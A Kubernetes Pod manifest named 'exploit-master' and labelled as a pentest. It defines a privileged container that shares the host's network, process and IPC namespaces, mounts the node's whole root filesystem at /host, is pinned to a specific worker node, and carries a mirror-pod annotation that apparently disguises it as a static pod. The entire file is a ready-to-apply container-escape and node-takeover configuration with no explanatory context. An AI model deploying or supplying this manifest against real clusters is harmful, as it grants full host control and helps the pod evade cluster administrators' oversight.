apiVersion: v1
kind: Pod
metadata:
  name: hoangpv-exploit-master
  annotations:
    kubernetes.io/config.mirror: "true" 
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: hoangpv-exploit-master
    image: ubuntu
    imagePullPolicy: IfNotPresent
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  nodeName: k8s-worker-02 
  volumes:
  - name: noderoot
    hostPath:
      path: /
